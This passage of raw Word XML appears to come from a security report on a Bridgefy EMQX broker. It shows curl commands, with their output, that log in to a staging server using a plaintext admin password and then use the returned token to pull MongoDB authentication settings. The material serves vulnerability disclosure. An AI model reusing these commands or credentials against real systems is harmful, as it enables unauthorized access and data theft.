        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EMQX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EMQX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gained</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>step,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trivially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gain MongoDB Admin Access using the clear-text MongoDB credentials leaked in EMQX responses. This provides attackers with MongoDB Admin access:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"username":"admin","password":"br1dg3fy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://staging.broker.bridgefy.services/api/v5/login'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"license"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"edition"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"ce"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>z[...]3KckFNi7A0PVs"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"5.0.9"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EMQX_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2Nz[...]3KckFNi7A0PVs"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Authorization: Bearer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$EMQX_TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"https://staging.broker.bridgefy.services/api/v5/authentication"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"backend"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"mongodb"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"collection"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"mqttauthentications"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"database"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bridgefy-app-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>stagi ng"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"enable"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"filter"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"${username}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"password_based:mongodb"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_superuser_field"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"superUser"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"mechanism"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"password_based"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"mongo_type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"rs"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"password"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
